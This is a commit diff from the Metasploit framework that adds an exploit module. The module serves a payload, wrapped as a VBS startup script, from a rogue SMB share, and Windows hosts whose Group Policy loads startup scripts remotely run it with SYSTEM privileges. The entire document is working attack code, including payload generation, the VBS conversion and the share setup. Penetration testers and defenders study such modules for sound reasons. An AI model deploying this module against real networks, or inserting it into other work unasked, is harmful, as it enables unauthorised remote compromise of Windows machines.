Add module to exploit dangerous group policy startup scripts

2015-04-10 13:01:50 -05:00 · 2015-04-10 13:01:50 -05:00 · ab944b1897
parent 4419c1c728
commit ab944b1897
1 changed files with 73 additions and 0 deletions
--- a/modules/exploits/windows/smb/group_policy_startup.rb
+++ b/modules/exploits/windows/smb/group_policy_startup.rb
@ -0,0 +1,73 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'msf/core'
 class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE
  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Group Policy Startup Script From Shared Resource',
      'Description'   => %q{
        This is a general-purpose module for exploiting systems with Windows Group Policy
        configured to load VBS startup scripts from remote locations. This module runs a
        SMB shared resource that will provide a payload through an VBS file. The payload
        will be executed with SYSTEM privileges on the target loading it through Windows
        Group Policy. Have into account which the attacker still needs to the redirect the
        target traffic to the fake SMB share to exploit it successfully.
      },
      'Author'      =>
        [
          'Sam Bertram <sbertram[at]gdssecurity.com>', # BadSamba
          'juan vazquez' # msf module
        ],
      'References'     =>
        [
          ['URL', 'http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html'],
          ['URL', 'https://github.com/GDSSecurity/BadSamba']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Privileged'     => true,
      'Platform'       => 'win',
      'Arch'           => [ARCH_X86, ARCH_X86_64],
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 04 2015'
    ))
    register_options(
      [
        OptString.new('FILE_NAME', [ false, 'VBS File name to share (Default: random .vbs)'])
      ], self.class)
    deregister_options('FILE_CONTENTS')
  end
  def setup
    super
    exe = generate_payload_exe
    self.file_contents = Msf::Util::EXE.to_exe_vbs(exe)
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.vbs"
    print_status("File available on #{unc}...")
  end
 end